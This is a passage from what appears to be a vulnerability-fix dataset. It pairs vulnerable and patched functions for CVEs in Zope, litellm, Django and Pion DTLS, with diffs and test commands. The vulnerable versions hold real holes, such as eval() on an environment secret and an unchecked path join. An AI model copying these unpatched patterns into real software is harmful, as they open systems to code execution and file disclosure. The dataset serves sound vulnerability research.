traverse(cls, base, request, path_items):\n \"\"\"See ``zope.app.pagetemplate.engine``.\"\"\"\n\n path_items = list(path_items)\n path_items.reverse()\n\n while path_items:\n name = path_items.pop()\n if ITraversable.providedBy(base):\n base = getattr(base, cls.traverseMethod)(name)\n else:\n base = traversePathElement(base, name, path_items,\n request=request)\n\n return base"}], "fix_func": [{"id": "fix_py_145_1", "commit": "1f8456b", "file_path": "src/Products/PageTemplates/Expressions.py", "start_line": 65, 
"end_line": 91, "snippet": "def boboAwareZopeTraverse(object, path_items, econtext):\n \"\"\"Traverses a sequence of names, first trying attributes then items.\n\n This uses zope.traversing path traversal where possible and interacts\n correctly with objects providing OFS.interface.ITraversable when\n necessary (bobo-awareness).\n \"\"\"\n request = getattr(econtext, 'request', None)\n path_items = list(path_items)\n path_items.reverse()\n\n while path_items:\n name = path_items.pop()\n\n if name == '_':\n warnings.warn('Traversing to the name `_` is deprecated '\n 'and will be removed in Zope 6.',\n DeprecationWarning)\n elif name.startswith('_'):\n raise NotFound(name)\n\n if OFS.interfaces.ITraversable.providedBy(object):\n object = object.restrictedTraverse(name)\n else:\n object = traversePathElement(object, name, path_items,\n request=request)\n return object"}, {"id": "fix_py_145_2", "commit": "1f8456b", "file_path": "src/Products/PageTemplates/expression.py", "start_line": 57, "end_line": 79, "snippet": " def traverse(cls, base, request, path_items):\n \"\"\"See ``zope.app.pagetemplate.engine``.\"\"\"\n\n path_items = list(path_items)\n path_items.reverse()\n\n while path_items:\n name = path_items.pop()\n\n if name == '_':\n warnings.warn('Traversing to the name `_` is deprecated '\n 'and will be removed in Zope 6.',\n DeprecationWarning)\n elif name.startswith('_'):\n raise NotFound(name)\n\n if ITraversable.providedBy(base):\n base = getattr(base, cls.traverse_method)(name)\n else:\n base = traversePathElement(base, name, path_items,\n request=request)\n\n return base"}], "vul_patch": "--- a/src/Products/PageTemplates/Expressions.py\n+++ b/src/Products/PageTemplates/Expressions.py\n@@ -11,6 +11,14 @@\n \n while path_items:\n name = path_items.pop()\n+\n+ if name == '_':\n+ warnings.warn('Traversing to the name `_` is deprecated '\n+ 'and will be removed in Zope 6.',\n+ DeprecationWarning)\n+ elif name.startswith('_'):\n+ raise NotFound(name)\n+\n if OFS.interfaces.ITraversable.providedBy(object):\n object = object.restrictedTraverse(name)\n else:\n\n--- a/src/Products/PageTemplates/expression.py\n+++ b/src/Products/PageTemplates/expression.py\n@@ -6,8 +6,16 @@\n \n while path_items:\n name = path_items.pop()\n+\n+ if name == '_':\n+ warnings.warn('Traversing to the name `_` is deprecated '\n+ 'and will be removed in Zope 6.',\n+ DeprecationWarning)\n+ elif name.startswith('_'):\n+ raise NotFound(name)\n+\n if ITraversable.providedBy(base):\n- base = getattr(base, cls.traverseMethod)(name)\n+ base = getattr(base, cls.traverse_method)(name)\n else:\n base = traversePathElement(base, name, path_items,\n request=request)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-5751", "cve_description": "BerriAI/litellm version v1.35.8 contains a vulnerability where an attacker can achieve remote code execution. The vulnerability exists in the `add_deployment` function, which decodes and decrypts environment variables from base64 and assigns them to `os.environ`. An attacker can exploit this by sending a malicious payload to the `/config/update` endpoint, which is then processed and executed by the server when the `get_secret` function is triggered. 
This requires the server to use Google KMS and a database to store a model.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/BerriAI/litellm", "patch_url": ["https://github.com/BerriAI/litellm/commit/fcea4c22ad96b24436f196ae709f71932e84b0b8"], "programing_language": "Python", "vul_func": [{"id": "vul_py_224_1", "commit": "2b9e953", "file_path": "litellm/utils.py", "start_line": 7065, "end_line": 7274, "snippet": "def get_secret(\n secret_name: str,\n default_value: Optional[Union[str, bool]] = None,\n):\n key_management_system = litellm._key_management_system\n key_management_settings = litellm._key_management_settings\n args = locals()\n\n if secret_name.startswith(\"os.environ/\"):\n secret_name = secret_name.replace(\"os.environ/\", \"\")\n\n # Example: oidc/google/https://bedrock-runtime.us-east-1.amazonaws.com/model/stability.stable-diffusion-xl-v1/invoke\n if secret_name.startswith(\"oidc/\"):\n secret_name_split = secret_name.replace(\"oidc/\", \"\")\n oidc_provider, oidc_aud = secret_name_split.split(\"/\", 1)\n # TODO: Add caching for HTTP requests\n if oidc_provider == \"google\":\n oidc_token = oidc_cache.get_cache(key=secret_name)\n if oidc_token is not None:\n return oidc_token\n\n oidc_client = HTTPHandler(timeout=httpx.Timeout(timeout=600.0, connect=5.0))\n # https://cloud.google.com/compute/docs/instances/verifying-instance-identity#request_signature\n response = oidc_client.get(\n \"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/identity\",\n params={\"audience\": oidc_aud},\n headers={\"Metadata-Flavor\": \"Google\"},\n )\n if response.status_code == 200:\n oidc_token = response.text\n oidc_cache.set_cache(key=secret_name, value=oidc_token, ttl=3600 - 60)\n return oidc_token\n else:\n raise ValueError(\"Google OIDC provider failed\")\n elif oidc_provider == \"circleci\":\n # https://circleci.com/docs/openid-connect-tokens/\n env_secret = os.getenv(\"CIRCLE_OIDC_TOKEN\")\n if env_secret is None:\n raise ValueError(\"CIRCLE_OIDC_TOKEN not found in environment\")\n return env_secret\n elif oidc_provider == \"circleci_v2\":\n # https://circleci.com/docs/openid-connect-tokens/\n env_secret = os.getenv(\"CIRCLE_OIDC_TOKEN_V2\")\n if env_secret is None:\n raise ValueError(\"CIRCLE_OIDC_TOKEN_V2 not found in environment\")\n return env_secret\n elif oidc_provider == \"github\":\n # 
https://docs.github.com/en/actions/deployment/security-hardening-your-deployments/configuring-openid-connect-in-cloud-providers#using-custom-actions\n actions_id_token_request_url = os.getenv(\"ACTIONS_ID_TOKEN_REQUEST_URL\")\n actions_id_token_request_token = os.getenv(\"ACTIONS_ID_TOKEN_REQUEST_TOKEN\")\n if (\n actions_id_token_request_url is None\n or actions_id_token_request_token is None\n ):\n raise ValueError(\n \"ACTIONS_ID_TOKEN_REQUEST_URL or ACTIONS_ID_TOKEN_REQUEST_TOKEN not found in environment\"\n )\n\n oidc_token = oidc_cache.get_cache(key=secret_name)\n if oidc_token is not None:\n return oidc_token\n\n oidc_client = HTTPHandler(timeout=httpx.Timeout(timeout=600.0, connect=5.0))\n response = oidc_client.get(\n actions_id_token_request_url,\n params={\"audience\": oidc_aud},\n headers={\n \"Authorization\": f\"Bearer {actions_id_token_request_token}\",\n \"Accept\": \"application/json; api-version=2.0\",\n },\n )\n if response.status_code == 200:\n oidc_token = response.text[\"value\"]\n oidc_cache.set_cache(key=secret_name, value=oidc_token, ttl=300 - 5)\n return oidc_token\n else:\n raise ValueError(\"Github OIDC provider failed\")\n elif oidc_provider == \"azure\":\n # https://azure.github.io/azure-workload-identity/docs/quick-start.html\n azure_federated_token_file = os.getenv(\"AZURE_FEDERATED_TOKEN_FILE\")\n if azure_federated_token_file is None:\n raise ValueError(\"AZURE_FEDERATED_TOKEN_FILE not found in environment\")\n with open(azure_federated_token_file, \"r\") as f:\n oidc_token = f.read()\n return oidc_token\n else:\n raise ValueError(\"Unsupported OIDC provider\")\n\n try:\n if litellm.secret_manager_client is not None:\n try:\n client = litellm.secret_manager_client\n key_manager = \"local\"\n if key_management_system is not None:\n key_manager = key_management_system.value\n\n if key_management_settings is not None:\n if (\n secret_name not in key_management_settings.hosted_keys\n ): # allow user to specify which keys to check in hosted key manager\n key_manager = \"local\"\n\n if (\n key_manager == KeyManagementSystem.AZURE_KEY_VAULT.value\n or type(client).__module__ + \".\" + type(client).__name__\n == \"azure.keyvault.secrets._client.SecretClient\"\n ): # support Azure Secret Client - from azure.keyvault.secrets import SecretClient\n secret = client.get_secret(secret_name).value\n elif (\n key_manager == KeyManagementSystem.GOOGLE_KMS.value\n or client.__class__.__name__ == \"KeyManagementServiceClient\"\n ):\n encrypted_secret: Any = os.getenv(secret_name)\n if encrypted_secret is None:\n raise ValueError(\n f\"Google KMS requires the encrypted secret to be in the environment!\"\n )\n b64_flag = _is_base64(encrypted_secret)\n if b64_flag == True: # if passed in as encoded b64 string\n encrypted_secret = base64.b64decode(encrypted_secret)\n if not isinstance(encrypted_secret, bytes):\n # If it's not, assume it's a string and encode it to bytes\n ciphertext = eval(\n encrypted_secret.encode()\n ) # assuming encrypted_secret is something like - b'\\n$\\x00D\\xac\\xb4/t)07\\xe5\\xf6..'\n else:\n ciphertext = encrypted_secret\n\n response = client.decrypt(\n request={\n \"name\": litellm._google_kms_resource_name,\n \"ciphertext\": ciphertext,\n }\n )\n secret = response.plaintext.decode(\n \"utf-8\"\n ) # assumes the original value was encoded with utf-8\n elif key_manager == KeyManagementSystem.AWS_KMS.value:\n \"\"\"\n Only check the tokens which start with 'aws_kms/'. 
This prevents latency impact caused by checking all keys.\n \"\"\"\n encrypted_value = os.getenv(secret_name, None)\n if encrypted_value is None:\n raise Exception(\"encrypted value for AWS KMS cannot be None.\")\n # Decode the base64 encoded ciphertext\n ciphertext_blob = base64.b64decode(encrypted_value)\n\n # Set up the parameters for the decrypt call\n params = {\"CiphertextBlob\": ciphertext_blob}\n\n # Perform the decryption\n response = client.decrypt(**params)\n\n # Extract and decode the plaintext\n plaintext = response[\"Plaintext\"]\n secret = plaintext.decode(\"utf-8\")\n elif key_manager == KeyManagementSystem.AWS_SECRET_MANAGER.value:\n try:\n get_secret_value_response = client.get_secret_value(\n SecretId=secret_name\n )\n print_verbose(\n f\"get_secret_value_response: {get_secret_value_response}\"\n )\n except Exception as e:\n print_verbose(f\"An error occurred - {str(e)}\")\n # For a list of exceptions thrown, see\n # https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html\n raise e\n\n # assume there is 1 secret per secret_name\n secret_dict = json.loads(get_secret_value_response[\"SecretString\"])\n print_verbose(f\"secret_dict: {secret_dict}\")\n for k, v in secret_dict.items():\n secret = v\n print_verbose(f\"secret: {secret}\")\n elif key_manager == \"local\":\n secret = os.getenv(secret_name)\n else: # assume the default is infisicial client\n secret = client.get_secret(secret_name).secret_value\n except Exception as e: # check if it's in os.environ\n verbose_logger.error(\n f\"An exception occurred - {str(e)}\\n\\n{traceback.format_exc()}\"\n )\n secret = os.getenv(secret_name)\n try:\n secret_value_as_bool = ast.literal_eval(secret)\n if isinstance(secret_value_as_bool, bool):\n return secret_value_as_bool\n else:\n return secret\n except:\n return secret\n else:\n secret = os.environ.get(secret_name)\n try:\n secret_value_as_bool = (\n ast.literal_eval(secret) if secret is not None else None\n )\n if isinstance(secret_value_as_bool, bool):\n return secret_value_as_bool\n else:\n return secret\n except:\n return secret\n except Exception as e:\n if default_value is not None:\n return default_value\n else:\n raise e"}], "fix_func": [{"id": "fix_py_224_1", "commit": "fcea4c2", "file_path": "litellm/utils.py", "start_line": 7065, "end_line": 7271, "snippet": "def get_secret(\n secret_name: str,\n default_value: Optional[Union[str, bool]] = None,\n):\n key_management_system = litellm._key_management_system\n key_management_settings = litellm._key_management_settings\n args = locals()\n\n if secret_name.startswith(\"os.environ/\"):\n secret_name = secret_name.replace(\"os.environ/\", \"\")\n\n # Example: oidc/google/https://bedrock-runtime.us-east-1.amazonaws.com/model/stability.stable-diffusion-xl-v1/invoke\n if secret_name.startswith(\"oidc/\"):\n secret_name_split = secret_name.replace(\"oidc/\", \"\")\n oidc_provider, oidc_aud = secret_name_split.split(\"/\", 1)\n # TODO: Add caching for HTTP requests\n if oidc_provider == \"google\":\n oidc_token = oidc_cache.get_cache(key=secret_name)\n if oidc_token is not None:\n return oidc_token\n\n oidc_client = HTTPHandler(timeout=httpx.Timeout(timeout=600.0, connect=5.0))\n # https://cloud.google.com/compute/docs/instances/verifying-instance-identity#request_signature\n response = oidc_client.get(\n \"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/identity\",\n params={\"audience\": oidc_aud},\n headers={\"Metadata-Flavor\": \"Google\"},\n )\n if 
response.status_code == 200:\n oidc_token = response.text\n oidc_cache.set_cache(key=secret_name, value=oidc_token, ttl=3600 - 60)\n return oidc_token\n else:\n raise ValueError(\"Google OIDC provider failed\")\n elif oidc_provider == \"circleci\":\n # https://circleci.com/docs/openid-connect-tokens/\n env_secret = os.getenv(\"CIRCLE_OIDC_TOKEN\")\n if env_secret is None:\n raise ValueError(\"CIRCLE_OIDC_TOKEN not found in environment\")\n return env_secret\n elif oidc_provider == \"circleci_v2\":\n # https://circleci.com/docs/openid-connect-tokens/\n env_secret = os.getenv(\"CIRCLE_OIDC_TOKEN_V2\")\n if env_secret is None:\n raise ValueError(\"CIRCLE_OIDC_TOKEN_V2 not found in environment\")\n return env_secret\n elif oidc_provider == \"github\":\n # https://docs.github.com/en/actions/deployment/security-hardening-your-deployments/configuring-openid-connect-in-cloud-providers#using-custom-actions\n actions_id_token_request_url = os.getenv(\"ACTIONS_ID_TOKEN_REQUEST_URL\")\n actions_id_token_request_token = os.getenv(\"ACTIONS_ID_TOKEN_REQUEST_TOKEN\")\n if (\n actions_id_token_request_url is None\n or actions_id_token_request_token is None\n ):\n raise ValueError(\n \"ACTIONS_ID_TOKEN_REQUEST_URL or ACTIONS_ID_TOKEN_REQUEST_TOKEN not found in environment\"\n )\n\n oidc_token = oidc_cache.get_cache(key=secret_name)\n if oidc_token is not None:\n return oidc_token\n\n oidc_client = HTTPHandler(timeout=httpx.Timeout(timeout=600.0, connect=5.0))\n response = oidc_client.get(\n actions_id_token_request_url,\n params={\"audience\": oidc_aud},\n headers={\n \"Authorization\": f\"Bearer {actions_id_token_request_token}\",\n \"Accept\": \"application/json; api-version=2.0\",\n },\n )\n if response.status_code == 200:\n oidc_token = response.text[\"value\"]\n oidc_cache.set_cache(key=secret_name, value=oidc_token, ttl=300 - 5)\n return oidc_token\n else:\n raise ValueError(\"Github OIDC provider failed\")\n elif oidc_provider == \"azure\":\n # https://azure.github.io/azure-workload-identity/docs/quick-start.html\n azure_federated_token_file = os.getenv(\"AZURE_FEDERATED_TOKEN_FILE\")\n if azure_federated_token_file is None:\n raise ValueError(\"AZURE_FEDERATED_TOKEN_FILE not found in environment\")\n with open(azure_federated_token_file, \"r\") as f:\n oidc_token = f.read()\n return oidc_token\n else:\n raise ValueError(\"Unsupported OIDC provider\")\n\n try:\n if litellm.secret_manager_client is not None:\n try:\n client = litellm.secret_manager_client\n key_manager = \"local\"\n if key_management_system is not None:\n key_manager = key_management_system.value\n\n if key_management_settings is not None:\n if (\n secret_name not in key_management_settings.hosted_keys\n ): # allow user to specify which keys to check in hosted key manager\n key_manager = \"local\"\n\n if (\n key_manager == KeyManagementSystem.AZURE_KEY_VAULT.value\n or type(client).__module__ + \".\" + type(client).__name__\n == \"azure.keyvault.secrets._client.SecretClient\"\n ): # support Azure Secret Client - from azure.keyvault.secrets import SecretClient\n secret = client.get_secret(secret_name).value\n elif (\n key_manager == KeyManagementSystem.GOOGLE_KMS.value\n or client.__class__.__name__ == \"KeyManagementServiceClient\"\n ):\n encrypted_secret: Any = os.getenv(secret_name)\n if encrypted_secret is None:\n raise ValueError(\n f\"Google KMS requires the encrypted secret to be in the environment!\"\n )\n b64_flag = _is_base64(encrypted_secret)\n if b64_flag == True: # if passed in as encoded b64 string\n encrypted_secret = 
base64.b64decode(encrypted_secret)\n ciphertext = encrypted_secret\n else:\n raise ValueError(\n f\"Google KMS requires the encrypted secret to be encoded in base64\"\n )#fix for this vulnerability https://huntr.com/bounties/ae623c2f-b64b-4245-9ed4-f13a0a5824ce\n response = client.decrypt(\n request={\n \"name\": litellm._google_kms_resource_name,\n \"ciphertext\": ciphertext,\n }\n )\n secret = response.plaintext.decode(\n \"utf-8\"\n ) # assumes the original value was encoded with utf-8\n elif key_manager == KeyManagementSystem.AWS_KMS.value:\n \"\"\"\n Only check the tokens which start with 'aws_kms/'. This prevents latency impact caused by checking all keys.\n \"\"\"\n encrypted_value = os.getenv(secret_name, None)\n if encrypted_value is None:\n raise Exception(\"encrypted value for AWS KMS cannot be None.\")\n # Decode the base64 encoded ciphertext\n ciphertext_blob = base64.b64decode(encrypted_value)\n\n # Set up the parameters for the decrypt call\n params = {\"CiphertextBlob\": ciphertext_blob}\n\n # Perform the decryption\n response = client.decrypt(**params)\n\n # Extract and decode the plaintext\n plaintext = response[\"Plaintext\"]\n secret = plaintext.decode(\"utf-8\")\n elif key_manager == KeyManagementSystem.AWS_SECRET_MANAGER.value:\n try:\n get_secret_value_response = client.get_secret_value(\n SecretId=secret_name\n )\n print_verbose(\n f\"get_secret_value_response: {get_secret_value_response}\"\n )\n except Exception as e:\n print_verbose(f\"An error occurred - {str(e)}\")\n # For a list of exceptions thrown, see\n # https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html\n raise e\n\n # assume there is 1 secret per secret_name\n secret_dict = json.loads(get_secret_value_response[\"SecretString\"])\n print_verbose(f\"secret_dict: {secret_dict}\")\n for k, v in secret_dict.items():\n secret = v\n print_verbose(f\"secret: {secret}\")\n elif key_manager == \"local\":\n secret = os.getenv(secret_name)\n else: # assume the default is infisicial client\n secret = client.get_secret(secret_name).secret_value\n except Exception as e: # check if it's in os.environ\n verbose_logger.error(\n f\"An exception occurred - {str(e)}\\n\\n{traceback.format_exc()}\"\n )\n secret = os.getenv(secret_name)\n try:\n secret_value_as_bool = ast.literal_eval(secret)\n if isinstance(secret_value_as_bool, bool):\n return secret_value_as_bool\n else:\n return secret\n except:\n return secret\n else:\n secret = os.environ.get(secret_name)\n try:\n secret_value_as_bool = (\n ast.literal_eval(secret) if secret is not None else None\n )\n if isinstance(secret_value_as_bool, bool):\n return secret_value_as_bool\n else:\n return secret\n except:\n return secret\n except Exception as e:\n if default_value is not None:\n return default_value\n else:\n raise e"}], "vul_patch": "--- a/litellm/utils.py\n+++ b/litellm/utils.py\n@@ -118,14 +118,11 @@\n b64_flag = _is_base64(encrypted_secret)\n if b64_flag == True: # if passed in as encoded b64 string\n encrypted_secret = base64.b64decode(encrypted_secret)\n- if not isinstance(encrypted_secret, bytes):\n- # If it's not, assume it's a string and encode it to bytes\n- ciphertext = eval(\n- encrypted_secret.encode()\n- ) # assuming encrypted_secret is something like - b'\\n$\\x00D\\xac\\xb4/t)07\\xe5\\xf6..'\n+ ciphertext = encrypted_secret\n else:\n- ciphertext = encrypted_secret\n-\n+ raise ValueError(\n+ f\"Google KMS requires the encrypted secret to be encoded in base64\"\n+ )#fix for this vulnerability 
https://huntr.com/bounties/ae623c2f-b64b-4245-9ed4-f13a0a5824ce\n response = client.decrypt(\n request={\n \"name\": litellm._google_kms_resource_name,\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-33203", "cve_description": "Django before 2.2.24, 3.x before 3.1.12, and 3.2.x before 3.2.4 has a potential directory traversal via django.contrib.admindocs. Staff members could use the TemplateDetailView view to check the existence of arbitrary files. Additionally, if (and only if) the default admindocs templates have been customized by application developers to also show file contents, then not only the existence but also the file contents would have been exposed. In other words, there is directory traversal outside of the template root directories.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/django/django", "patch_url": ["https://github.com/django/django/commit/20c67a0693c4ede2b09af02574823485e82e4c8f", "https://github.com/django/django/commit/dfaba12cda060b8b292ae1d271b44bf810b1c5b9", "https://github.com/django/django/commit/053cc9534d174dc89daba36724ed2dcb36755b90"], "programing_language": "Python", "vul_func": [{"id": "vul_py_6_1", "commit": "aa8781c", "file_path": "django/contrib/admindocs/views.py", "start_line": 321, "end_line": 347, "snippet": " def get_context_data(self, **kwargs):\n template = self.kwargs['template']\n templates = []\n try:\n default_engine = Engine.get_default()\n except ImproperlyConfigured:\n # Non-trivial TEMPLATES settings aren't supported (#24125).\n pass\n else:\n # This doesn't account for template loaders (#24128).\n for index, directory in enumerate(default_engine.dirs):\n template_file = Path(directory) / template\n if template_file.exists():\n template_contents = template_file.read_text()\n else:\n template_contents = ''\n templates.append({\n 'file': template_file,\n 'exists': template_file.exists(),\n 'contents': template_contents,\n 'order': index,\n })\n return super().get_context_data(**{\n **kwargs,\n 'name': template,\n 'templates': templates,\n })"}], "fix_func": [{"id": "fix_py_6_1", "commit": "20c67a0", "file_path": "django/contrib/admindocs/views.py", "start_line": 322, "end_line": 348, "snippet": " def get_context_data(self, **kwargs):\n template = self.kwargs['template']\n templates = []\n try:\n default_engine = Engine.get_default()\n except ImproperlyConfigured:\n # Non-trivial TEMPLATES settings aren't supported (#24125).\n pass\n else:\n # This doesn't account for template loaders (#24128).\n for index, directory in enumerate(default_engine.dirs):\n template_file = Path(safe_join(directory, template))\n if template_file.exists():\n template_contents = template_file.read_text()\n else:\n template_contents = ''\n templates.append({\n 'file': template_file,\n 'exists': template_file.exists(),\n 'contents': template_contents,\n 'order': index,\n })\n return 
super().get_context_data(**{\n **kwargs,\n 'name': template,\n 'templates': templates,\n })"}], "vul_patch": "--- a/django/contrib/admindocs/views.py\n+++ b/django/contrib/admindocs/views.py\n@@ -9,7 +9,7 @@\n else:\n # This doesn't account for template loaders (#24128).\n for index, directory in enumerate(default_engine.dirs):\n- template_file = Path(directory) / template\n+ template_file = Path(safe_join(directory, template))\n if template_file.exists():\n template_contents = template_file.read_text()\n else:\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-33203:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/django\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ncd tests && /workspace/PoC_env/CVE-2021-33203/bin/python ./runtests.py admin_docs.test_views.AdminDocViewDefaultEngineOnly.test_template_detail_path_traversal\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-33203:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/django\ngit apply --whitespace=nowarn /workspace/fix.patch\ncd tests && /workspace/PoC_env/CVE-2021-33203/bin/python ./runtests.py admin_docs.test_views\n"} {"cve_id": "CVE-2022-29222", "cve_description": "Pion DTLS is a Go implementation of Datagram Transport Layer Security. Prior to version 2.1.5, a DTLS Client could provide a Certificate that it doesn't posses the private key for and Pion DTLS wouldn't reject it. This issue affects users that are using Client certificates only. The connection itself is still secure. The Certificate provided by clients can't be trusted when using a Pion DTLS server prior to version 2.1.5. Users should upgrade to version 2.1.5 to receive a patch. There are currently no known workarounds.", "cwe_info": {"CWE-295": {"name": "Improper Certificate Validation", "description": "The product does not validate, or incorrectly validates, a certificate."}}, "repo": "https://github.com/pion/dtls", "patch_url": ["https://github.com/pion/dtls/commit/d2f797183a9f044ce976e6df6f362662ca722412"], "programing_language": "Go", "vul_func": [{"id": "vul_go_87_1", "commit": "a6397ff", "file_path": "flight4handler.go", "start_line": "19", "end_line": "201", "snippet": "func flight4Parse(ctx context.Context, c flightConn, state *State, cache *handshakeCache, cfg *handshakeConfig) (flightVal, *alert.Alert, error) { //nolint:gocognit\n\tseq, msgs, ok := cache.fullPullMap(state.handshakeRecvSequence, state.cipherSuite,\n\t\thandshakeCachePullRule{handshake.TypeCertificate, cfg.initialEpoch, true, true},\n\t\thandshakeCachePullRule{handshake.TypeClientKeyExchange, cfg.initialEpoch, true, false},\n\t\thandshakeCachePullRule{handshake.TypeCertificateVerify, cfg.initialEpoch, true, true},\n\t)\n\tif !ok {\n\t\t// No valid message received. 
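Illustrative sketch of what safe_join() buys the Django patch above: the joined path must still live under the template directory after normalization. This standard-library rendering is an assumption for illustration, not Django's internal implementation.

import os

def contained_join(directory: str, untrusted: str) -> str:
    base = os.path.abspath(directory)
    candidate = os.path.abspath(os.path.join(base, untrusted))
    # commonpath() collapses to the shared prefix, so any escape changes it
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"{untrusted!r} escapes {base!r}")
    return candidate

Given base '/templates', contained_join rejects '../../etc/passwd' but accepts 'admin/index.html'.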
Keep reading\n\t\treturn 0, nil, nil\n\t}\n\n\t// Validate type\n\tvar clientKeyExchange *handshake.MessageClientKeyExchange\n\tif clientKeyExchange, ok = msgs[handshake.TypeClientKeyExchange].(*handshake.MessageClientKeyExchange); !ok {\n\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, nil\n\t}\n\n\tif h, hasCert := msgs[handshake.TypeCertificate].(*handshake.MessageCertificate); hasCert {\n\t\tstate.PeerCertificates = h.Certificate\n\t\t// If the client offer its certificate, just disable session resumption.\n\t\t// Otherwise, we have to store the certificate identitfication and expire time.\n\t\t// And we have to check whether this certificate expired, revoked or changed.\n\t\t//\n\t\t// https://curl.se/docs/CVE-2016-5419.html\n\t\tstate.SessionID = nil\n\t}\n\n\tif h, hasCertVerify := msgs[handshake.TypeCertificateVerify].(*handshake.MessageCertificateVerify); hasCertVerify {\n\t\tif state.PeerCertificates == nil {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.NoCertificate}, errCertificateVerifyNoCertificate\n\t\t}\n\n\t\tplainText := cache.pullAndMerge(\n\t\t\thandshakeCachePullRule{handshake.TypeClientHello, cfg.initialEpoch, true, false},\n\t\t\thandshakeCachePullRule{handshake.TypeServerHello, cfg.initialEpoch, false, false},\n\t\t\thandshakeCachePullRule{handshake.TypeCertificate, cfg.initialEpoch, false, false},\n\t\t\thandshakeCachePullRule{handshake.TypeServerKeyExchange, cfg.initialEpoch, false, false},\n\t\t\thandshakeCachePullRule{handshake.TypeCertificateRequest, cfg.initialEpoch, false, false},\n\t\t\thandshakeCachePullRule{handshake.TypeServerHelloDone, cfg.initialEpoch, false, false},\n\t\t\thandshakeCachePullRule{handshake.TypeCertificate, cfg.initialEpoch, true, false},\n\t\t\thandshakeCachePullRule{handshake.TypeClientKeyExchange, cfg.initialEpoch, true, false},\n\t\t)\n\n\t\t// Verify that the pair of hash algorithm and signiture is listed.\n\t\tvar validSignatureScheme bool\n\t\tfor _, ss := range cfg.localSignatureSchemes {\n\t\t\tif ss.Hash == h.HashAlgorithm && ss.Signature == h.SignatureAlgorithm {\n\t\t\t\tvalidSignatureScheme = true\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\tif !validSignatureScheme {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InsufficientSecurity}, errNoAvailableSignatureSchemes\n\t\t}\n\n\t\tif err := verifyCertificateVerify(plainText, h.HashAlgorithm, h.Signature, state.PeerCertificates); err != nil {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.BadCertificate}, err\n\t\t}\n\t\tvar chains [][]*x509.Certificate\n\t\tvar err error\n\t\tvar verified bool\n\t\tif cfg.clientAuth >= VerifyClientCertIfGiven {\n\t\t\tif chains, err = verifyClientCert(state.PeerCertificates, cfg.clientCAs); err != nil {\n\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.BadCertificate}, err\n\t\t\t}\n\t\t\tverified = true\n\t\t}\n\t\tif cfg.verifyPeerCertificate != nil {\n\t\t\tif err := cfg.verifyPeerCertificate(state.PeerCertificates, chains); err != nil {\n\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.BadCertificate}, err\n\t\t\t}\n\t\t}\n\t\tstate.peerCertificatesVerified = verified\n\t}\n\n\tif !state.cipherSuite.IsInitialized() {\n\t\tserverRandom := state.localRandom.MarshalFixed()\n\t\tclientRandom := state.remoteRandom.MarshalFixed()\n\n\t\tvar err error\n\t\tvar preMasterSecret []byte\n\t\tif state.cipherSuite.AuthenticationType() == CipherSuiteAuthenticationTypePreSharedKey {\n\t\t\tvar psk []byte\n\t\t\tif psk, 
err = cfg.localPSKCallback(clientKeyExchange.IdentityHint); err != nil {\n\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, err\n\t\t\t}\n\t\t\tstate.IdentityHint = clientKeyExchange.IdentityHint\n\t\t\tswitch state.cipherSuite.KeyExchangeAlgorithm() {\n\t\t\tcase CipherSuiteKeyExchangeAlgorithmPsk:\n\t\t\t\tpreMasterSecret = prf.PSKPreMasterSecret(psk)\n\t\t\tcase (CipherSuiteKeyExchangeAlgorithmPsk | CipherSuiteKeyExchangeAlgorithmEcdhe):\n\t\t\t\tif preMasterSecret, err = prf.EcdhePSKPreMasterSecret(psk, clientKeyExchange.PublicKey, state.localKeypair.PrivateKey, state.localKeypair.Curve); err != nil {\n\t\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, err\n\t\t\t\t}\n\t\t\tdefault:\n\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, errInvalidCipherSuite\n\t\t\t}\n\t\t} else {\n\t\t\tpreMasterSecret, err = prf.PreMasterSecret(clientKeyExchange.PublicKey, state.localKeypair.PrivateKey, state.localKeypair.Curve)\n\t\t\tif err != nil {\n\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.IllegalParameter}, 